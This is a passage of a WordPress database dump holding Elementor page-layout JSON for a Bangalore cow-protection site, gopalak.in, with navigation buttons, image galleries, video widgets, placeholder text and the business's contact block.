e}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10055,1682,'_elementor_page_assets','a:0:{}'),(10058,1683,'_elementor_edit_mode','builder'),(10059,1683,'_elementor_template_type','wp-page'),(10060,1683,'_elementor_version','3.7.8'),(10061,1683,'_wp_page_template','elementor_canvas'),(10062,1683,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10063,1683,'_elementor_page_assets','a:0:{}'),(10065,1684,'_elementor_edit_mode','builder'),(10066,1684,'_elementor_template_type','wp-page'),(10067,1684,'_elementor_version','3.7.8'),(10068,1684,'_wp_page_template','elementor_canvas'),(10069,1684,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 